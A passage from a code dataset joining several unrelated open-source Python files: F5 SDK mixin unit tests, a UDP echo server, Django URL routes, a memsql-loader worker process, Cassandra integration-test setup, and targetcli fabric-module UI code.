"kind": "tm:ltm:fakeendpoint:fakeres"})
class TestCommandExecutionMixin(object):
def test_create_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.create()
def test_delete_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.delete()
def test_load_raises(self):
command_resource = CommandExecutionMixin()
with pytest.raises(UnsupportedMethod):
command_resource.load()
def test_exec_cmd_instance(self):
fake_res = FakeCommandResource(mock.MagicMock())
cmd1 = fake_res.exec_cmd('fakecommand')
cmd2 = fake_res.exec_cmd('fakecommand2')
assert cmd1 is not cmd2
def fake_http_server(uri, **kwargs):
session = requests.Session()
adapter = requests_mock.Adapter()
session.mount('mock', adapter)
adapter.register_uri('GET', uri, **kwargs)
return session
class FakeAsmFileMixin(AsmFileMixin):
def __init__(self, uri, **kwargs):
session = fake_http_server(uri, **kwargs)
self._meta_data = {'icr_session': session}
self.file_bound_uri = uri
class TestAsmFileMixin(object):
def test_download(self):
# Prepare baseline file
f = open('fakefile.txt', 'wb')
f.write(struct.pack('B', 0))
basefilesize = int(os.stat('fakefile.txt').st_size)
f.close()
# Start Testing
server_fakefile = 'asasasas' * 40
srvfakesize = len(server_fakefile)
header = {'Content-Length': str(srvfakesize),
'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin('mock://test.com/fakefile.txt',
text=server_fakefile, headers=header,
status_code=200)
dwnld._download_file('fakefile.txt')
endfilesize = int(os.stat('fakefile.txt').st_size)
assert basefilesize != srvfakesize
assert endfilesize == srvfakesize
assert endfilesize == 320
def test_404_response(self):
# Cleanup
os.remove('fakefile.txt')
# Test Start
header = {'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fakefile.txt', headers=header,
status_code=404, reason='Not Found')
try:
dwnld._download_file('fakefile.txt')
except HTTPError as err:
assert err.response.status_code == 404
def test_zero_content_length_header(self):
# Test Start
header = {'Content-Type': 'application/text',
'Content-Length': '0'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fake_file.txt', headers=header,
status_code=200)
with pytest.raises(EmptyContent) as err:
dwnld._download_file('fakefile.txt')
msg = "Invalid Content-Length value returned: %s ,the value " \
"should be greater than 0"
assert err.value.message == msg
def test_no_content_length_header(self):
# Test Start
header = {'Content-Type': 'application/text'}
dwnld = FakeAsmFileMixin(
'mock://test.com/fakefile.txt', headers=header,
status_code=200)
with pytest.raises(MissingHttpHeader) as err:
dwnld._download_file('fakefile.txt')
msg = "The Content-Length header is not present."
assert err.value.message == msg
| F5Networks/f5-common-python | f5/bigip/test/unit/test_mixins.py | Python | apache-2.0 | 7,579 |
# Some magic for Python3
try:
import SocketServer as socketserver
except ImportError:
import socketserver
import logging
import sys
import threading
class EchoUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
logging.info("%s wrote:" % (str(self.client_address[0]),))
logging.info(data)
socket.sendto(data.upper(), self.client_address)
class ServeThread(threading.Thread):
def run(self):
HOST, PORT = 'localhost', 5556
server = socketserver.UDPServer((HOST, PORT), EchoUDPHandler)
server.serve_forever()
def serve():
st = ServeThread()
st.start()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
serve()
| rc500/ardrone_archive_aarons_laptop | ardrone/udpechoserver.py | Python | apache-2.0 | 746 |
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf.urls import url
from django.views.decorators.cache import never_cache
from submissions.views import (SubmissionsOptions, SubmissionListAPIView, SubmissionConstructionAPIView,
SubmissionAlterationAPIView, SubmissionDecommissionAPIView,
SubmissionGetAPIView, SubmissionStaffEditAPIView,
PreSignedDocumentKey,)
from gwells.urls import api_path_prefix
urlpatterns = [
# Submissions form options
url(api_path_prefix() + r'/submissions/options$',
never_cache(SubmissionsOptions.as_view()), name='submissions-options'),
# Submissions list
url(api_path_prefix() + r'/submissions$',
never_cache(SubmissionListAPIView.as_view()), name='submissions-list'),
# Submission
url(api_path_prefix() + r'/submissions/(?P<filing_number>[0-9]+)$',
never_cache(SubmissionGetAPIView.as_view()), name='submissions-get'),
# Construction submission
url(api_path_prefix() + r'/submissions/construction$',
never_cache(SubmissionConstructionAPIView.as_view()), name='CON'),
# Alteration submission
url(api_path_prefix() + r'/submissions/alteration$',
never_cache(SubmissionAlterationAPIView.as_view()), name='ALT'),
# Decommission submission
url(api_path_prefix() + r'/submissions/decommission$',
never_cache(SubmissionDecommissionAPIView.as_view()), name='DEC'),
# Edit submission
url(api_path_prefix() + r'/submissions/staff_edit$',
never_cache(SubmissionStaffEditAPIView().as_view()), name='STAFF_EDIT'),
# Document Uploading (submission records)
url(api_path_prefix() + r'/submissions/(?P<submission_id>[0-9]+)/presigned_put_url$',
never_cache(PreSignedDocumentKey.as_view()), name='submissions-pre-signed-url'),
]
| bcgov/gwells | app/backend/submissions/urls.py | Python | apache-2.0 | 2,402 |
import multiprocessing
import threading
import uuid
import random
import time
import os
import signal
import traceback
from memsql_loader.api import shared
from memsql_loader.db import connection_wrapper, pool
from memsql_loader.loader_db.tasks import Tasks
from memsql_loader.loader_db.jobs import Jobs
from memsql_loader.execution.errors import WorkerException, ConnectionException, RequeueTask
from memsql_loader.execution.loader import Loader
from memsql_loader.execution.downloader import Downloader
from memsql_loader.util import db_utils, log
from memsql_loader.util.fifo import FIFO
from memsql_loader.util.apsw_sql_step_queue.errors import APSWSQLStepQueueException, TaskDoesNotExist
HUNG_DOWNLOADER_TIMEOUT = 3600
class ExitingException(Exception):
pass
class Worker(multiprocessing.Process):
def __init__(self, worker_sleep, parent_pid, worker_lock):
self.worker_id = uuid.uuid1().hex[:8]
self.worker_sleep = worker_sleep
self.worker_lock = worker_lock
self.worker_working = multiprocessing.Value('i', 1)
self.parent_pid = parent_pid
self._exit_evt = multiprocessing.Event()
self.logger = log.get_logger('worker[%s]' % self.worker_id)
super(Worker, self).__init__(name=('worker-%s' % self.worker_id))
def kill_query_if_exists(self, conn_args, conn_id):
with pool.get_connection(database='information_schema', **conn_args) as conn:
id_row = conn.query("SELECT id FROM processlist WHERE info LIKE '%%LOAD DATA%%' AND id=%s", conn_id)
if len(id_row) > 0:
# Since this is a LOAD DATA LOCAL query, we need to kill the
# connection, not the query, since LOAD DATA LOCAL queries
# don't end until the file is fully read, even if they're
# killed.
db_utils.try_kill_connection(conn, conn_id)
def kill_delete_query_if_exists(self, conn_args, conn_id):
with pool.get_connection(database='information_schema', **conn_args) as conn:
id_row = conn.query("SELECT id FROM processlist WHERE info LIKE '%%DELETE%%' AND id=%s", conn_id)
if len(id_row) > 0:
db_utils.try_kill_query(conn, conn_id)
def signal_exit(self):
self._exit_evt.set()
def is_working(self):
return self.worker_working.value == 1
def run(self):
self.jobs = Jobs()
self.tasks = Tasks()
task = None
ignore = lambda *args, **kwargs: None
signal.signal(signal.SIGINT, ignore)
signal.signal(signal.SIGQUIT, ignore)
try:
while not self.exiting():
time.sleep(random.random() * 0.5)
task = self.tasks.start()
if task is None:
self.worker_working.value = 0
else:
self.worker_working.value = 1
job_id = task.job_id
job = self.jobs.get(job_id)
old_conn_id = task.data.get('conn_id', None)
if old_conn_id is not None:
self.kill_query_if_exists(job.spec.connection, old_conn_id)
self.logger.info('Task %d: starting' % task.task_id)
try:
# can't use a pooled connection due to transactions staying open in the
# pool on failure
with pool.get_connection(database=job.spec.target.database, pooled=False, **job.spec.connection) as db_connection:
db_connection.execute("BEGIN")
self._process_task(task, db_connection)
self.logger.info('Task %d: finished with success', task.task_id)
except (RequeueTask, ConnectionException):
self.logger.info('Task %d: download failed, requeueing', task.task_id)
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
task.requeue()
except TaskDoesNotExist as e:
self.logger.info('Task %d: finished with error, the task was either cancelled or deleted', task.task_id)
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
except WorkerException as e:
task.error(str(e))
self.logger.info('Task %d: finished with error', task.task_id)
except Exception as e:
self.logger.debug("Traceback: %s" % (traceback.format_exc()))
raise
raise ExitingException()
except ExitingException:
self.logger.debug('Worker exiting')
if task is not None and not task.valid():
try:
task.requeue()
except APSWSQLStepQueueException:
pass
def _process_task(self, task, db_connection):
job_id = task.job_id
job = self.jobs.get(job_id)
if job is None:
raise WorkerException('Failed to find job with ID %s' % job_id)
# If this is a gzip file, we add .gz to the named pipe's name so that
# MemSQL knows to decompress it unless we're piping this into a script,
# in which case we do the decompression here in-process.
if job.spec.options.script is not None:
gzip = False
else:
gzip = task.data['key_name'].endswith('.gz')
fifo = FIFO(gzip=gzip)
# reduces the chance of synchronization between workers by
# initially sleeping in the order they were started and then
# randomly sleeping after that point
time.sleep(self.worker_sleep)
self.worker_sleep = 0.5 * random.random()
if self.exiting() or not task.valid():
raise ExitingException()
if job.has_file_id():
if self._should_delete(job, task):
self.logger.info('Waiting for DELETE lock before cleaning up rows from an earlier load')
try:
while not self.worker_lock.acquire(block=True, timeout=0.5):
if self.exiting() or not task.valid():
raise ExitingException()
task.ping()
self.logger.info('Attempting cleanup of rows from an earlier load')
num_deleted = self._delete_existing_rows(db_connection, job, task)
self.logger.info('Deleted %s rows during cleanup' % num_deleted)
finally:
try:
self.worker_lock.release()
except ValueError:
# This is raised if we didn't acquire the lock (e.g. if
# there was a KeyboardInterrupt before we acquired the
# lock above. In this case, we don't need to
# release the lock.
pass
if self.exiting() or not task.valid():
raise ExitingException()
downloader = Downloader()
downloader.load(job, task, fifo)
loader = Loader()
loader.load(job, task, fifo, db_connection)
loader.start()
downloader.start()
try:
while not self.exiting():
time.sleep(0.5)
with task.protect():
self._update_task(task, downloader)
task.save()
if downloader.is_alive() and time.time() > downloader.metrics.last_change + HUNG_DOWNLOADER_TIMEOUT:
# downloader has frozen, and the progress handler froze as well
self.logger.error("Detected hung downloader. Trying to exit.")
self.signal_exit()
loader_alive = loader.is_alive()
downloader_alive = downloader.is_alive()
if not loader_alive or not downloader_alive:
if loader.error or downloader.error:
# We want to make sure that in the case of simultaneous
# exceptions, we see both before deciding what to do
time.sleep(3)
# Only exit if at least 1 error or both are not alive
elif not loader_alive and not downloader_alive:
break
else:
continue
loader_error = loader.error
loader_tb = loader.traceback
downloader_error = downloader.error
downloader_tb = downloader.traceback
any_requeue_task = isinstance(loader_error, RequeueTask) or isinstance(downloader_error, RequeueTask)
loader_worker_exception = isinstance(loader_error, WorkerException)
downloader_worker_exception = isinstance(downloader_error, WorkerException)
# If we have any RequeueTasks, then requeue
if any_requeue_task:
raise RequeueTask()
# Raise the earlier exception
elif loader_worker_exception and downloader_worker_exception:
if loader_error.time < downloader_error.time:
raise loader_error, None, loader_tb
else:
raise downloader_error, None, downloader_tb
# If they're both exceptions but one of them isn't a WorkerException
elif (downloader_error and loader_error) and (loader_worker_exception or downloader_worker_exception):
if not loader_worker_exception:
raise loader_error, None, loader_tb
else:
raise downloader_error, None, downloader_tb
# We don't have any WorkerExceptions, raise a random one
# Also handles the case where only one exception is raised
elif downloader_error or loader_error:
raise downloader_error or loader_error, None, downloader_tb or loader_tb
else:
assert False, 'Program should only reach this conditional block if at least one error exists'
finally:
if downloader.is_alive():
downloader.terminate()
self.logger.info('Waiting for threads to exit...')
while downloader.is_alive() or loader.is_alive():
loader.join(5)
downloader.join(5)
if task.valid():
task.ping()
if self.exiting():
raise ExitingException()
with task.protect():
db_connection.execute("COMMIT")
self._update_task(task, downloader)
task.finish('success')
def _should_delete(self, job, task):
competing_job_ids = ["'%s'" % j.id for j in self.jobs.query_target(job.spec.connection.host, job.spec.connection.port, job.spec.target.database, job.spec.target.table)]
predicate_sql = "file_id = :file_id and job_id in (%s)" % ','.join(competing_job_ids)
matching = self.tasks.get_tasks_in_state(
[ shared.TaskState.SUCCESS ],
extra_predicate=(predicate_sql, { 'file_id': task.file_id }))
return len(matching) > 0
def _delete_existing_rows(self, conn, job, task):
file_id = task.file_id
sql = {
'database_name': job.spec.target.database,
'table_name': job.spec.target.table,
'file_id_column': job.spec.options.file_id_column
}
thread_ctx = {
'num_deleted': 0,
'exception': None
}
def _run_delete_query():
try:
thread_ctx['num_deleted'] = conn.query('''
DELETE FROM `%(database_name)s`.`%(table_name)s`
WHERE `%(file_id_column)s` = %%s
''' % sql, file_id)
except connection_wrapper.ConnectionWrapperException as e:
self.logger.error(
'Connection error when cleaning up rows: %s', str(e))
thread_ctx['exception'] = RequeueTask()
except pool.MySQLError as e:
errno, msg = e.args
msg = 'Error when cleaning up rows (%d): %s' % (errno, msg)
self.logger.error(msg)
thread_ctx['exception'] = RequeueTask()
except Exception as e:
thread_ctx['exception'] = e
t = threading.Thread(target=_run_delete_query)
t.start()
while not self.exiting() and task.valid():
try:
# Ping the task to let the SQL queue know that it's still active.
task.ping()
except TaskDoesNotExist:
# The task might have gotten cancelled between when we checked
# whether it's valid and when we ping() it. If ping() fails and
# it has been cancelled in between, then we should proceed with
# killing the delete query if it exists
continue
if not t.is_alive():
break
time.sleep(0.5)
else:
# delete thread didn't finish on its own
self.kill_delete_query_if_exists(job.spec.connection, conn.thread_id())
t.join()
exc = thread_ctx['exception']
if exc is not None:
raise exc
return thread_ctx['num_deleted']
def _update_task(self, task, downloader):
stats = downloader.metrics.get_stats()
task.bytes_downloaded = stats['bytes_downloaded']
task.download_rate = stats['download_rate']
task.data['time_left'] = stats['time_left']
def exiting(self):
try:
os.kill(self.parent_pid, 0)
except OSError:
# parent process does not exist, exit immediately
return True
return self._exit_evt.is_set()
| memsql/memsql-loader | memsql_loader/execution/worker.py | Python | apache-2.0 | 14,261 |
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import traceback
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import logging
log = logging.getLogger(__name__)
import os
from threading import Event
import six
from subprocess import call
from itertools import groupby
from cassandra.cluster import Cluster
try:
from ccmlib.cluster import Cluster as CCMCluster
from ccmlib.cluster_factory import ClusterFactory as CCMClusterFactory
from ccmlib import common
except ImportError as e:
CCMClusterFactory = None
CLUSTER_NAME = 'test_cluster'
SINGLE_NODE_CLUSTER_NAME = 'single_node'
MULTIDC_CLUSTER_NAME = 'multidc_test_cluster'
CCM_CLUSTER = None
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'ccm')
if not os.path.exists(path):
os.mkdir(path)
cass_version = None
cql_version = None
def get_server_versions():
"""
Probe system.local table to determine Cassandra and CQL version.
Returns a tuple of (cassandra_version, cql_version).
"""
global cass_version, cql_version
if cass_version is not None:
return (cass_version, cql_version)
c = Cluster(protocol_version=1)
s = c.connect()
row = s.execute('SELECT cql_version, release_version FROM system.local')[0]
cass_version = _tuple_version(row.release_version)
cql_version = _tuple_version(row.cql_version)
c.shutdown()
return (cass_version, cql_version)
def _tuple_version(version_string):
if '-' in version_string:
version_string = version_string[:version_string.index('-')]
return tuple([int(p) for p in version_string.split('.')])
USE_CASS_EXTERNAL = bool(os.getenv('USE_CASS_EXTERNAL', False))
default_cassandra_version = '2.1.3'
if USE_CASS_EXTERNAL:
if CCMClusterFactory:
# see if the external instance is running in ccm
path = common.get_default_path()
name = common.current_cluster_name(path)
CCM_CLUSTER = CCMClusterFactory.load(common.get_default_path(), name)
CCM_CLUSTER.start(wait_for_binary_proto=True, wait_other_notice=True)
# Not sure what's going on, but the server version query
# hangs in python3. This appears to be related to running inside of
# nosetests, and only for this query that would run while loading the
# module.
# This is a hack to make it run with default cassandra version for PY3.
# Not happy with it, but need to move on for now.
if not six.PY3:
cass_ver, _ = get_server_versions()
default_cassandra_version = '.'.join('%d' % i for i in cass_ver)
else:
if not os.getenv('CASSANDRA_VERSION'):
log.warning("Using default C* version %s because external server cannot be queried" % default_cassandra_version)
CASSANDRA_DIR = os.getenv('CASSANDRA_DIR', None)
CASSANDRA_VERSION = os.getenv('CASSANDRA_VERSION', default_cassandra_version)
CCM_KWARGS = {}
if CASSANDRA_DIR:
log.info("Using Cassandra dir: %s", CASSANDRA_DIR)
CCM_KWARGS['install_dir'] = CASSANDRA_DIR
else:
log.info('Using Cassandra version: %s', CASSANDRA_VERSION)
CCM_KWARGS['version'] = CASSANDRA_VERSION
if CASSANDRA_VERSION > '2.1':
default_protocol_version = 3
elif CASSANDRA_VERSION > '2.0':
default_protocol_version = 2
else:
default_protocol_version = 1
PROTOCOL_VERSION = int(os.getenv('PROTOCOL_VERSION', default_protocol_version))
def get_cluster():
return CCM_CLUSTER
def get_node(node_id):
return CCM_CLUSTER.nodes['node%s' % node_id]
def use_multidc(dc_list):
use_cluster(MULTIDC_CLUSTER_NAME, dc_list, start=True)
def use_singledc(start=True):
use_cluster(CLUSTER_NAME, [3], start=start)
def use_single_node(start=True):
use_cluster(SINGLE_NODE_CLUSTER_NAME, [1], start=start)
def remove_cluster():
if USE_CASS_EXTERNAL:
return
global CCM_CLUSTER
if CCM_CLUSTER:
log.debug("removing cluster %s", CCM_CLUSTER.name)
CCM_CLUSTER.remove()
CCM_CLUSTER = None
def is_current_cluster(cluster_name, node_counts):
global CCM_CLUSTER
if CCM_CLUSTER and CCM_CLUSTER.name == cluster_name:
if [len(list(nodes)) for dc, nodes in
groupby(CCM_CLUSTER.nodelist(), lambda n: n.data_center)] == node_counts:
return True
return False
def use_cluster(cluster_name, nodes, ipformat=None, start=True):
global CCM_CLUSTER
if USE_CASS_EXTERNAL:
if CCM_CLUSTER:
log.debug("Using external ccm cluster %s", CCM_CLUSTER.name)
else:
log.debug("Using unnamed external cluster")
return
if is_current_cluster(cluster_name, nodes):
log.debug("Using existing cluster %s", cluster_name)
return
if CCM_CLUSTER:
log.debug("Stopping cluster %s", CCM_CLUSTER.name)
CCM_CLUSTER.stop()
try:
try:
cluster = CCMClusterFactory.load(path, cluster_name)
log.debug("Found existing ccm %s cluster; clearing", cluster_name)
cluster.clear()
cluster.set_install_dir(**CCM_KWARGS)
except Exception:
log.debug("Creating new ccm %s cluster with %s", cluster_name, CCM_KWARGS)
cluster = CCMCluster(path, cluster_name, **CCM_KWARGS)
cluster.set_configuration_options({'start_native_transport': True})
common.switch_cluster(path, cluster_name)
cluster.populate(nodes, ipformat=ipformat)
if start:
log.debug("Starting ccm %s cluster", cluster_name)
cluster.start(wait_for_binary_proto=True, wait_other_notice=True)
setup_test_keyspace(ipformat=ipformat)
CCM_CLUSTER = cluster
except Exception:
log.exception("Failed to start ccm cluster. Removing cluster.")
remove_cluster()
call(["pkill", "-9", "-f", ".ccm"])
raise
def teardown_package():
if USE_CASS_EXTERNAL:
return
# when multiple modules are run explicitly, this runs between them
# need to make sure CCM_CLUSTER is properly cleared for that case
remove_cluster()
for cluster_name in [CLUSTER_NAME, MULTIDC_CLUSTER_NAME]:
try:
cluster = CCMClusterFactory.load(path, cluster_name)
try:
cluster.remove()
log.info('Removed cluster: %s' % cluster_name)
except Exception:
log.exception('Failed to remove cluster: %s' % cluster_name)
except Exception:
log.warn('Did not find cluster: %s' % cluster_name)
def setup_test_keyspace(ipformat=None):
# wait for nodes to startup
time.sleep(10)
if not ipformat:
cluster = Cluster(protocol_version=PROTOCOL_VERSION)
else:
cluster = Cluster(contact_points=["::1"], protocol_version=PROTOCOL_VERSION)
session = cluster.connect()
try:
results = session.execute("SELECT keyspace_name FROM system.schema_keyspaces")
existing_keyspaces = [row[0] for row in results]
for ksname in ('test1rf', 'test2rf', 'test3rf'):
if ksname in existing_keyspaces:
session.execute("DROP KEYSPACE %s" % ksname)
ddl = '''
CREATE KEYSPACE test3rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '3'}'''
session.execute(ddl)
ddl = '''
CREATE KEYSPACE test2rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '2'}'''
session.execute(ddl)
ddl = '''
CREATE KEYSPACE test1rf
WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '1'}'''
session.execute(ddl)
ddl = '''
CREATE TABLE test3rf.test (
k int PRIMARY KEY,
v int )'''
session.execute(ddl)
except Exception:
traceback.print_exc()
raise
finally:
cluster.shutdown()
class UpDownWaiter(object):
def __init__(self, host):
self.down_event = Event()
self.up_event = Event()
host.monitor.register(self)
def on_up(self, host):
self.up_event.set()
def on_down(self, host):
self.down_event.set()
def wait_for_down(self):
self.down_event.wait()
def wait_for_up(self):
self.up_event.wait()
| sontek/python-driver | tests/integration/__init__.py | Python | apache-2.0 | 8,900 |
'''
Implements the targetcli target related UI.
This file is part of targetcli.
Copyright (c) 2011-2013 by Datera, Inc
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
try:
import ethtool
except ImportError:
ethtool = None
import os
import six
import stat
from configshell_fb import ExecutionError
from rtslib_fb import RTSLibBrokenLink, RTSLibError
from rtslib_fb import MappedLUN, NetworkPortal, NodeACL
from rtslib_fb import LUN, Target, TPG, StorageObjectFactory
from .ui_backstore import complete_path
from .ui_node import UINode, UIRTSLibNode
auth_params = ('userid', 'password', 'mutual_userid', 'mutual_password')
discovery_params = auth_params + ("enable",)
class UIFabricModule(UIRTSLibNode):
'''
A fabric module UI.
'''
def __init__(self, fabric_module, parent):
super(UIFabricModule, self).__init__(fabric_module.name,
fabric_module, parent,
late_params=True)
self.refresh()
if self.rtsnode.has_feature('discovery_auth'):
for param in discovery_params:
self.define_config_group_param('discovery_auth',
param, 'string')
self.refresh()
# Support late params
#
# By default the base class will call list_parameters and list_attributes
# in init. This stops us from being able to lazy-load fabric modules.
# We declare we support "late_params" to stop this, and then
# this code overrides the base class methods that involve enumerating
# this stuff, so we don't need to call list_parameters/attrs (which
# would cause the module to load) until the ui is actually asking for
# them from us.
# Currently fabricmodules don't have these anyways, this is all a CYA thing.
def list_config_groups(self):
groups = super(UIFabricModule, self).list_config_groups()
if len(self.rtsnode.list_parameters()):
groups.append('parameter')
if len(self.rtsnode.list_attributes()):
groups.append('attribute')
return groups
# Support late params (see above)
def list_group_params(self, group, writable=None):
if group not in ("parameter", "attribute"):
return super(UIFabricModule, self).list_group_params(group,
writable)
params_func = getattr(self.rtsnode, "list_%ss" % group)
params = params_func()
params_ro = params_func(writable=False)
ret_list = []
for param in params:
p_writable = param not in params_ro
if writable is not None and p_writable != writable:
continue
ret_list.append(param)
ret_list.sort()
return ret_list
# Support late params (see above)
def get_group_param(self, group, param):
if group not in ("parameter", "attribute"):
return super(UIFabricModule, self).get_group_param(group, param)
if param not in self.list_group_params(group):
raise ValueError("Not such parameter %s in configuration group %s"
% (param, group))
description = "The %s %s." % (param, group)
writable = param in self.list_group_params(group, writable=True)
return dict(name=param, group=group, type="string",
description=description, writable=writable)
def ui_getgroup_discovery_auth(self, auth_attr):
'''
This is the backend method for getting discovery_auth attributes.
@param auth_attr: The auth attribute to get the value of.
@type auth_attr: str
@return: The auth attribute's value
@rtype: str
'''
if auth_attr == 'enable':
return self.rtsnode.discovery_enable_auth
else:
return getattr(self.rtsnode, "discovery_" + auth_attr)
def ui_setgroup_discovery_auth(self, auth_attr, value):
'''
This is the backend method for setting discovery auth attributes.
@param auth_attr: The auth attribute to set the value of.
@type auth_attr: str
@param value: The auth's value
@type value: str
'''
self.assert_root()
if value is None:
value = ''
if auth_attr == 'enable':
self.rtsnode.discovery_enable_auth = value
else:
setattr(self.rtsnode, "discovery_" + auth_attr, value)
def refresh(self):
self._children = set([])
for target in self.rtsnode.targets:
self.shell.log.debug("Found target %s under fabric module %s."
% (target.wwn, target.fabric_module))
if target.has_feature('tpgts'):
UIMultiTPGTarget(target, self)
else:
UITarget(target, self)
def summary(self):
status = None
msg = []
fm = self.rtsnode
if fm.has_feature('discovery_auth') and fm.discovery_enable_auth:
if not (fm.discovery_password and fm.discovery_userid):
status = False
else:
status = True
if fm.discovery_authenticate_target:
msg.append("mutual disc auth")
else:
msg.append("1-way disc auth")
msg.append("Targets: %d" % len(self._children))
return (", ".join(msg), status)
def ui_command_create(self, wwn=None):
'''
Creates a new target. The I{wwn} format depends on the transport(s)
supported by the fabric module. If the I{wwn} is ommited, then a
target will be created using either a randomly generated WWN of the
proper type, or the first unused WWN in the list of possible WWNs if
one is available. If WWNs are constrained to a list (i.e. for hardware
targets addresses) and all WWNs are in use, the target creation will
fail. Use the B{info} command to get more information abour WWN type
and possible values.
SEE ALSO
========
B{info}
'''
self.assert_root()
target = Target(self.rtsnode, wwn, mode='create')
wwn = target.wwn
if self.rtsnode.wwns != None and wwn not in self.rtsnode.wwns:
self.shell.log.warning("Hardware missing for this WWN")
if target.has_feature('tpgts'):
ui_target = UIMultiTPGTarget(target, self)
self.shell.log.info("Created target %s." % wwn)
return ui_target.ui_command_create()
else:
ui_target = UITarget(target, self)
self.shell.log.info("Created target %s." % wwn)
return self.new_node(ui_target)
def ui_complete_create(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command create.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn' and self.rtsnode.wwns is not None:
existing_wwns = [child.wwn for child in self.rtsnode.targets]
completions = [wwn for wwn in self.rtsnode.wwns
if wwn.startswith(text)
if wwn not in existing_wwns]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_delete(self, wwn):
'''
Recursively deletes the target with the specified I{wwn}, and all
objects hanging under it.
SEE ALSO
========
B{create}
'''
self.assert_root()
target = Target(self.rtsnode, wwn, mode='lookup')
target.delete()
self.shell.log.info("Deleted Target %s." % wwn)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
@param current_param: Name of parameter to complete.
@type current_param: str
@return: Possible completions
@rtype: list of str
'''
if current_param == 'wwn':
wwns = [child.name for child in self.children]
completions = [wwn for wwn in wwns if wwn.startswith(text)]
else:
completions = []
if len(completions) == 1:
return [completions[0] + ' ']
else:
return completions
def ui_command_info(self):
'''
Displays information about the fabric module, notably the supported
transports(s) and accepted B{wwn} format(s), as long as supported
features.
'''
fabric = self.rtsnode
self.shell.log.info("Fabric module name: %s" % self.name)
self.shell.log.info("ConfigFS path: %s" % self.rtsnode.path)
self.shell.log.info("Allowed WWN types: %s" % ", ".join(fabric.wwn_types))
if fabric.wwns is not None:
self.shell.log.info("Allowed WWNs list: %s" % ', '.join(fabric.wwns))
self.shell.log.info("Fabric module features: %s" % ', '.join(fabric.features))
self.shell.log.info("Corresponding kernel module: %s"
% fabric.kernel_module)
def ui_command_version(self):
'''
Displays the target fabric module version.
'''
version = "Target fabric module %s: %s" \
% (self.rtsnode.name, self.rtsnode.version)
self.shell.con.display(version.strip())
class UIMultiTPGTarget(UIRTSLibNode):
'''
A generic target UI that has multiple TPGs.
'''
def __init__(self, target, parent):
super(UIMultiTPGTarget, self).__init__(target.wwn, target, parent)
self.refresh()
def refresh(self):
self._children = set([])
for tpg in self.rtsnode.tpgs:
UITPG(tpg, self)
def summary(self):
try:
self.rtsnode.fabric_module.to_normalized_wwn(self.rtsnode.wwn)
except:
return ("INVALID WWN", False)
return ("TPGs: %d" % len(self._children), None)
def ui_command_create(self, tag=None):
'''
Creates a new Target Portal Group within the target. The
I{tag} must be a positive integer value, optionally prefaced
by 'tpg'. If omitted, the next available Target Portal Group
Tag (TPGT) will be used.
SEE ALSO
========
B{delete}
'''
self.assert_root()
if tag:
if tag.startswith("tpg"):
tag = tag[3:]
try:
tag = int(tag)
except ValueError:
raise ExecutionError("Tag argument must be a number.")
tpg = TPG(self.rtsnode, tag, mode='create')
if self.shell.prefs['auto_enable_tpgt']:
tpg.enable = True
if tpg.has_feature("auth"):
tpg.set_attribute("authentication", 0)
self.shell.log.info("Created TPG %s." % tpg.tag)
if tpg.has_feature("nps") and self.shell.prefs['auto_add_default_portal']:
try:
NetworkPortal(tpg, "0.0.0.0")
self.shell.log.info("Global pref auto_add_default_portal=true")
self.shell.log.info("Created default portal listening on all IPs"
" (0.0.0.0), port 3260.")
except RTSLibError:
self.shell.log.info("Default portal not created, TPGs within a " +
"target cannot share ip:port.")
ui_tpg = UITPG(tpg, self)
return self.new_node(ui_tpg)
def ui_command_delete(self, tag):
'''
Deletes the Target Portal Group with TPGT I{tag} from the target. The
I{tag} must be a positive integer matching an existing TPGT.
SEE ALSO
========
B{create}
'''
self.assert_root()
if tag.startswith("tpg"):
tag = tag[3:]
try:
tag = int(tag)
except ValueError:
raise ExecutionError("Tag argument must be a number.")
tpg = TPG(self.rtsnode, tag, mode='lookup')
tpg.delete()
self.shell.log.info("Deleted TPGT %s." % tag)
self.refresh()
def ui_complete_delete(self, parameters, text, current_param):
'''
Parameter auto-completion method for user command delete.
@param parameters: Parameters on the command line.
@type parameters: dict
@param text: Current text of parameter being typed by the user.
@type text: str
